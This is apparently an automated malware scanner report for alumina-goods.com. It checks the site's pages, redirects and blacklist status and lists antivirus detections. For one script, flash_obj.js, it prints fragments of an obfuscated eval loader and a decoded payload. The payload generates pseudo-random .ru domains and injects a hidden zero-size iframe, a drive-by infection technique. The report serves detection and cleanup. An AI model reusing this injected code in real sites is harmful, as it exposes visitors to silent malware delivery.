New scan:

Malware Scanner report for alumina-goods.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://alumina-goods.com/
200 OK
Content-Length: 31204
Content-Type: text/html
clean
http://alumina-goods.com/flash_obj.js
200 OK
Content-Length: 5961
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



function flash_obj(obj,width,height) {
htmlstr="<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\""+width+"\" height=\""+height+"\">";
htmlstr+="<param name=\"movie\" value=\""+obj+"\">";
htmlstr+="<param name=\"quality\" value=\"high\">";
htmlstr+="<param name=\"wmode\" value=\"transparent\">";
htmlstr+="
... 5037 bytes are skipped ...
05,230,105,196,105,216,105,232,121,122,34,208,105,200,100,202,110,68,59,200,111,198,117,218,101,220,116,92,98,222,100,242,46,194,112,224,101,220,100,134,104,210,108,200,40,210,102,228,109,82,125,250,99,194,116,198,104,80,101,82,123,250,125,88,53,96,48,82,59];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));}
if(f)e(s);

Decoded script:


function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb
... 3039 bytes are skipped ...
.round(+ new Date / 1000);
var domainName = generatePseudoRandomString(unix, 16, "ru");
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */

Antivirus reports:

AntiVir
JS/Niamod.A
nProtect
JS:Trojan.Iframer.C
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Iframer.C (B)
DrWeb
JS.IFrame.274
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
NANO-Antivirus
Trojan.Script.Agent.xyevo
F-Secure
JS:Trojan.Iframer.C
F-Prot
JS/IFrame.QW
AVG
HTML/Framer
GData
JS:Trojan.Iframer.C
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Iframer.C

http://alumina-goods.com/index.asp
200 OK
Content-Length: 31204
Content-Type: text/html
clean
http://alumina-goods.com/company.asp
200 OK
Content-Length: 27428
Content-Type: text/html
clean
http://alumina-goods.com/product.asp
200 OK
Content-Length: 30125
Content-Type: text/html
clean
http://alumina-goods.com/quality.asp
200 OK
Content-Length: 26426
Content-Type: text/html
clean
http://alumina-goods.com/dload.asp
200 OK
Content-Length: 27503
Content-Type: text/html
clean
http://alumina-goods.com/liuyan.asp?action=Add_New
200 OK
Content-Length: 36175
Content-Type: text/html
clean
http://alumina-goods.com/contact.asp
200 OK
Content-Length: 26760
Content-Type: text/html
clean
http://alumina-goods.com/product.asp?Pone=1&plt=2
200 OK
Content-Length: 26086
Content-Type: text/html
clean
http://alumina-goods.com/product.asp?Pone=1&plt=1
200 OK
Content-Length: 26086
Content-Type: text/html
clean
http://alumina-goods.com/product.asp?Pone=1&plt=3
200 OK
Content-Length: 26086
Content-Type: text/html
clean
http://alumina-goods.com/product.asp?Pone=1&plt=5
200 OK
Content-Length: 26086
Content-Type: text/html
clean
http://alumina-goods.com/product.asp?Pone=1&plt=6
200 OK
Content-Length: 26086
Content-Type: text/html
clean
http://alumina-goods.com/product.asp?Pone=1&plt=11
200 OK
Content-Length: 26086
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: alumina-goods.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 21 Jun 2014 23:39:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31204
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSCSBCADT=PFKBNLADDFGJMNJMJFNCLJBL; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET

...31204 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alumina-goods.com
Referer: http://www.google.com/search?q=alumina-goods.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=alumina-goods.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alumina-goods.com/

Result: alumina-goods.com is not infected or malware details are not published yet.